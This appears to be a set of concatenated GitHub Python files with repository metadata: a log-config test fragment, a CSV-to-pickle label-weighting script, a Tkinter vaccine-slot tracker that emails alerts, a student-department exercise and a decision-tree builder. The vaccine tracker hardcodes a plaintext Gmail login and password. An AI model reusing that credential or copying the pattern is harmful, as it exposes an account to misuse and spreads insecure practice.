log.register(self.test_url_name, ['GET', 'POST'])(LogGenerator)
assert len(test_config[self.test_url_name]) == 2
assert test_config[self.test_url_name]['GET'] == LogGenerator
assert test_config[self.test_url_name]['POST'] == LogGenerator
def test_register_additional_info(self):
log = LogConfig()
addition = AdditionalInfoBeforeDelete()
log.register(self.test_url_name, 'POST', additional_info=True)(
LogGenerator)
assert addition._config[self.test_url_name]['POST'] == LogGenerator
| liushiwen555/unified_management_platform_backend | log/tests/test_log_generator/test_log_config.py | test_log_config.py | py | 1,196 | python | en | code | 0 | github-code | 90 |
8673455441 | import os
import pandas as pd
import pickle
def read_scv_content(csv_path):
df = pd.read_csv(csv_path)
label_value_pairs = []
for index, row in df.iterrows():
key_value_pairs = {} # 创建一个空字典用于存放键值对
key = row[1] # 第二列作为键
# print(csv_path)
value = 1.0 / row[2] # 第三列作为值
key_value_pairs[key] = value
label_value_pairs.append(key_value_pairs)
return label_value_pairs
# def label_weight_Set(key_value_pairs)
def set_lable_value(label_value_pairs, n ,m):
#count计算实体集中有多少个实体,result_dit存放最终结果
count = len(label_value_pairs)
label_weight_dict = {}
#将具有相同标签的实体,将其标签的权重相加在一起
for my_set in label_value_pairs:
for key, value in my_set.items():
if key in label_weight_dict:
label_weight_dict[key] += value
else:
label_weight_dict[key] = value
#计算最终实体集的标签和标签的权重
for key, value in label_weight_dict.items():
mid_value = (value ** int(n)) / (count ** int(m))
label_weight_dict[key] = mid_value
# print(result_dict)
# print(label_weight_dict)
return label_weight_dict
def offine_processing(folder_path, m, n):
# 遍历文件夹中的每个文件
label_weight_set = []
files = []
for filename in os.listdir(folder_path):
file_path = os.path.join(folder_path, filename)
if file_path.endswith('.csv'):
# print(file_path)
# print(filename)
files.append(filename)
label_value_pairs = read_scv_content(file_path)
label_weight_dict = set_lable_value(label_value_pairs, m, n)
label_weight_set.append(label_weight_dict)
# print(label_weight_set)
# print(files)
return label_weight_set, files
def read_folder_attributes(folder_path, fnames):
# 存放所有表格的表头的二维列表
attributes = []
# 遍历文件夹中的所有文件
for filename in fnames:
if filename.endswith('.csv'):
file_path = os.path.join(folder_path, filename)
# 读取CSV文件,假设第一行是表头
df = pd.read_csv(file_path)
# 获取表头,并存放在一个列表中
headers_list = df.columns.tolist()
# 将表头列表添加到all_headers中
attributes.append(headers_list)
return attributes
def can_unique_label(can_label_folder_path, fnames):
unique_labels = []
# 遍历文件夹中的所有文件
for filename in fnames:
if filename.endswith('.csv'):
file_path = os.path.join(can_label_folder_path, filename)
# 读取CSV文件,假设第一行是表头
df = pd.read_csv(file_path)
# 获取第二列数据,不包含表头
second_column_data = df.iloc[:, 1]
# 将第一列数据转换为Python列表
second_column_list = second_column_data.tolist()
# 将列表转换为集合,自动去重
unique_set = set(second_column_list)
# 如果需要,将集合转换回列表
unique_list = list(unique_set)
print(unique_list)
# 将表头列表添加到all_headers中
unique_labels.append(unique_list)
# print(len(fnames))
# print(len(unique_labels))
return unique_labels
#
p1 = r'freebaseResult'
p2 = r'freebase'
# p1 = r'test_free_result'
# p2 = r'test_free'
label_weight_set, files = offine_processing(p1, 2, 2)
attributes = read_folder_attributes(p2, files)
unique_label = can_unique_label(p1, files)
print(len(label_weight_set))
print(len(attributes))
print(len(unique_label))
with open(file = 'label.pkl',mode = 'wb') as f:
pickle.dump(label_weight_set, f)
with open(file = 'file_names.pkl',mode = 'wb') as f:
pickle.dump(files, f)
with open(file='candidate_attributes_list.pkl', mode='wb') as f:
pickle.dump(attributes, f)
with open(file='unique_label.pkl',mode='wb') as f:
pickle.dump(unique_label, f) | anqing1953561931/Finding_related_table | offline_processing.py | offline_processing.py | py | 4,186 | python | en | code | 0 | github-code | 90 |
70188445097 | import requests
import time
from bs4 import BeautifulSoup
import smtplib
import tkinter as tk
import tkinter.messagebox as tkm
class Processor():
def __init__(self, p, d, m, age):
self.p = p
self.d = d
self.m = m
self.age = age
self.stop = 0
self.tracker()
def tracker(self):
flag = 0
for t in range(6):
URL = f"https://cdn-api.co-vin.in/api/v2/appointment/sessions/public/findByPin?pincode={self.p}&date={self.d}"
headers = {"User Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36"}
page = requests.get(URL, headers=headers)
soup = BeautifulSoup(page.content, "html.parser")
data = str(soup)
final_data = self.str_to_list(data)
if self.is_available(final_data):
flag = 1
break
if self.stop == 1:
break
time.sleep(10)
if flag == 0 and self.stop == 0:
tkm.showinfo("showinfo", "No Vaccines Available")
def is_available(self, final_data):
if len(final_data) == 0:
print(tkm.showinfo("showinfo", "No Vaccines Available"))
self.stop = 1
else:
check = "available_capacity"
flag = 0
maxcap = -1
tempdct = {}
for fd in final_data:
age_lim = int(fd["min_age_limit"])
if (age_lim == 18):
age_lim = 0
else:
age_lim = 1
if int(fd[check]) > maxcap and age_lim == self.age:
maxcap = int(fd[check])
tempdct = fd
if len(tempdct) == 0:
print(tkm.showinfo("showinfo", "No Vaccines Available"))
elif int(tempdct[check]) > 0:
self.send_mail(tempdct)
return True
return False
def str_to_list(self, data):
temp = ""
org_data = []
for i in range(13, len(data) - 1):
if data[i] == '{' or data[i] == ',':
continue
elif data[i] == '}':
org_data.append(temp)
temp = ""
else:
temp += data[i]
final_data = []
for d in org_data:
dct = {}
p = ''
cnt = 0
t1 = ""
t2 = ""
for c in d:
if c == '"' and cnt == 1 and p != ':':
t1 = t1.replace('"', '')
t2 = t2.replace('"', '')
dct[t1] = t2
t1 = ""
t2 = ""
cnt = 0
if c == ':' and cnt == 0:
cnt = cnt + 1
p = c
continue
if cnt == 0:
t1 += c
else:
t2 += c
p = c
final_data.append(dct)
return final_data
def send_mail(self, arg):
server = smtplib.SMTP("smtp.gmail.com", 587)
server.ehlo()
server.starttls()
server.ehlo()
server.login("vaxtracker2021@gmail.com", "tracker2021vaccine")
subject = "Vaccination slot is available"
b1 = "Hospital: " + arg["name"] + ", " + arg["address"] + "\n" + "Pin Code: " + arg["pincode"] + "\n"
b2 = "Minimum age limit: " + arg["min_age_limit"] + "\n"
b3 = "Vaccine: " + arg["vaccine"] + "\n"
b4 = "No. of doses: " + arg['available_capacity'] + "\n"
b5 = "Dose 1: " + arg['available_capacity_dose1'] + "\n"
b6 = "Dose 2: " + arg['available_capacity_dose2'] + "\n"
b7 = "Fee: " + arg["fee"] + "\n"
b8= "Book appointment here: https://selfregistration.cowin.gov.in/"+"\n"
body = b1 + b2 + b3 + b4 + b5 + b6 + b7+b8
message = f"subject: {subject}\n\n {body}"
server.sendmail("vaxtracker2021@gmail.com", self.m, message)
server.quit()
print("Your mail has been sent successfully")
class Application(tk.Frame):
def __init__(self, master=None):
super().__init__(master)
self.master = master
self.grid()
self.create_layout()
def create_layout(self):
label_pin = tk.Label(self)
label_pin["text"] = "PinCode"
label_pin["font"] = "Calibri 15"
label_pin["height"] = 2
label_pin.grid(row=0, column=0)
label_date = tk.Label(self)
label_date["text"] = "Date"
label_date["font"] = "Calibri 15"
label_date["height"] = 1
label_date.grid(row=1, column=0)
label_mail = tk.Label(self)
label_mail["text"] = "UserEmail"
label_mail["font"] = "Calibri 15"
label_mail["height"] = 2
label_mail["width"] = 10
label_mail.grid(row=2, column=0)
label_age = tk.Label(self)
label_age["text"] = "AgeLimit"
label_age["font"] = "Calibri 15"
label_age["height"] = 1
label_age.grid(row=3, column=0)
self.entry_pin = tk.Entry(self)
self.entry_pin["font"] = "Calibri 15"
self.entry_pin["width"] = 20
self.entry_pin.grid(row=0, column=1, columnspan=2)
self.entry_date = tk.Entry(self)
self.entry_date["font"] = "Calibri 15"
self.entry_date["width"] = 20
self.entry_date.grid(row=1, column=1, columnspan=2)
self.entry_mail = tk.Entry(self)
self.entry_mail["font"] = "Calibri 15"
self.entry_mail["width"] = 20
self.entry_mail.grid(row=2, column=1, columnspan=2)
self.val = tk.IntVar()
rb18 = tk.Radiobutton(self)
rb18["text"] = "18-44"
rb18["value"] = 0
rb18["variable"] = self.val
rb18["font"] = "Calibri 11"
rb18.grid(row=3, column=1)
rb45 = tk.Radiobutton(self)
rb45["text"] = "45+"
rb45["value"] = 1
rb45["variable"] = self.val
rb45["font"] = "Calibri 11"
rb45.grid(row=3, column=2)
btn_sub = tk.Button(self)
btn_sub["text"] = "SUBMIT"
btn_sub["font"] = "Calibri 9 bold"
btn_sub["command"] = self.on_click_sub
btn_sub.grid(row=4, column=1)
def on_click_sub(self):
pin = str(self.entry_pin.get())
date = str(self.entry_date.get())
mail = str(self.entry_mail.get())
age = self.val.get()
if pin == "" or date == "" or mail == "":
print(tkm.showerror("showerror", "Enter Valid Data"))
else:
self.pro = Processor(pin, date, mail, age)
root = tk.Tk()
root.geometry("350x200")
root.title("Vaccine Tracker")
app = Application(master = root)
app.mainloop() | ayan07-eng/VaccineTracker-main | VaccineTracker-main/main.py | main.py | py | 7,077 | python | en | code | 1 | github-code | 90 |
71661241256 | class Student:
'''Student details'''
def __init__(self, id_no, name, dept, subject_names):
self.id_no = id_no
self.name = name
self.subject_names = subject_names
self.dept = dept
def get_student_department(self):
return self.dept
def get_student_subjects(self):
return self.subject_names
class Department:
'''Department details'''
def __init__(self, department_name, students, department_subjects):
self.department_name = department_name
self.students = students
self.department_subjects = department_subjects
def get_students_name(self):
return self.students
def get_department_subjects(self):
return self.department_subjects
def get_department_name(self):
return self.department_name
def overlapping_subjects_among_departments():
common_subjects = []
for department in department_obj_list:
if common_subjects == []:
common_subjects = department.get_department_subjects()
else:
overlap_subject = []
for i in common_subjects:
if i in department.get_department_subjects():
overlap_subject.append(i)
common_subjects = overlap_subject
return 'Subjects that overlap between various departments: {}'.format(common_subjects)
def more_than_three_subject():
dept_list = []
for student in student_obj_list:
if len(student.get_student_subjects()) > 3:
if student.get_student_department() not in dept_list:
dept_list.append(student.get_student_department())
return '\nName of the departments where students take more than 3 courses : {}\n'.format(dept_list)
def display_students_name_in_the_department():
user_department_name = input('Which department students name you want to see? \nmech\ncivil\ncse\nit \nType any one: ').lower().strip()
for department in department_obj_list:
if department.get_department_name() == user_department_name:
print('\n{} department students are: {}'.format(department.get_department_name(),department.get_students_name()))
return
else:
print('\nwrong input')
department1 = Department('mech', ['yogesh', 'ram', 'venkat'], ['dynamics', 'fluid mechanics', 'english', 'thermodynamics'])
department2 = Department('civil', ['leo'], ['construction', 'structural', 'english', 'finite particles'])
department3 = Department('cse', ['ajay', 'sweetha'], ['html', 'python', 'english', 'java'])
department4 = Department('it', ['ruby', 'anandh', 'andharipa'], ['sql', 'python', 'english', 'java', 'oracle'])
department_obj_list = [department1, department2, department3, department4]
student1 = Student(9144516, 'yogesh', 'MECH', ['english', 'fluid mechanics', 'dynamics'])
student2 = Student(9145212, 'ram', 'MECH', ['dynamics', 'fluid mechanics', 'english'])
student3 = Student(9143156, 'venkat', 'MECH', ['english', 'fluid mechanics', 'dynamics'])
student4 = Student(9126545, 'ruby', 'IT', ['sql', 'python', 'english', 'java'])
student5 = Student(9124841, 'anandh', 'IT', ['english', 'python', 'sql'])
student6 = Student(9159872, 'ajay', 'CSE', ['html', 'python', 'english'])
student7 = Student(9122476, 'andhripa', 'IT', ['english', 'python', 'sql', 'java'])
student8 = Student(9173245, 'leo', 'CIVIL', ['construction', 'structural', 'english'])
student9 = Student(9153587, 'sweetha', 'CSE', ['english', 'python', 'html'])
student_obj_list = [student1, student2, student3, student4, student5, student6, student7, student8, student9]
display_students_name_in_the_department()
print(more_than_three_subject())
print(overlapping_subjects_among_departments())
| yogeshjean12/Thoughtworks-Python-Assignments | department_problem.py | department_problem.py | py | 3,725 | python | en | code | 0 | github-code | 90 |
40756109049 | from math import log
import operator
'''计算香农熵'''
def calShannon(dataSet):
numOfData = len(dataSet)
labelCounts = {}
for featV in dataSet:
currentLabel = featV[-1]
if currentLabel not in labelCounts.keys():
labelCounts[currentLabel] = 0
labelCounts[currentLabel] += 1
shannon = 0.0
for key in labelCounts:
prob = float(labelCounts[key]) / numOfData
shannon -= prob*log(prob, 2)
return shannon
'''创建数据集'''
def createDataSet():
dataSet = [[1, 1, 'yes'], [1, 1, 'yes'], [1, 0, 'no'], [0, 1, 'no'], [0, 1, 'no']]
labels = ['no surfacing', 'flippers']
return dataSet, labels
'''按特征划分数据集,把符合要求的元素取出来'''
def splitDataSet(dataSet, axis, value):
retDataSet = []
for featV in dataSet:
if featV[axis] == value:
reduceFeatV = featV[:axis]
reduceFeatV.extend(featV[axis+1:])
retDataSet.append(reduceFeatV)
return retDataSet
'''选择最佳划分方案'''
def choose(dataSet):
numOfFeat = len(dataSet[0]) - 1
shannon = calShannon(dataSet)
bestInfoGain = 0.0
bestFeature = -1
for i in range(numOfFeat):
featList = [example[i] for example in dataSet]
uniqueV = set(featList)
newShannon = 0.0
for value in uniqueV:
subDataSet = splitDataSet(dataSet, i, value)
prob = len(subDataSet) / float(len(dataSet))
newShannon += prob * calShannon(subDataSet)
infoGain = shannon - newShannon
if (infoGain > bestInfoGain):
bestInfoGain = infoGain
bestFeature = i
return bestFeature
'''决定子节点分类'''
def majorityCnt(classList):
classCount = {}
for vote in classList:
if vote not in classCount.keys():
classCount[vote] = 0
classCount[vote] += 1
sortedCount = sorted(classCount.items(), key=operator.itemgetter(1), reverse=True)
return sortedCount[0][0]
'''创建树的函数'''
def createTrees(dataSet, labels):
classList =[example[-1] for example in dataSet]
if classList.count(classList[0]) == len(classList):
return classList[0]
if len(dataSet[0]) == 1:
return majorityCnt(classList)
bestFeat = choose(dataSet)
bestLabel = labels[bestFeat]
myTree = {bestLabel:{}}
del(labels[bestFeat])
featValues = [example[bestFeat] for example in dataSet]
uniqueVals = set(featValues)
for value in uniqueVals:
subLabels = labels[:]
myTree[bestLabel][value] = createTrees(splitDataSet(dataSet, bestFeat, value), subLabels)
return myTree
myData, labels = createDataSet()
myTree = createTrees(myData, labels)
print(myTree) | qzylalala/MachineLearning | Trees/trees.py | trees.py | py | 2,757 | python | en | code | 0 | github-code | 90 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.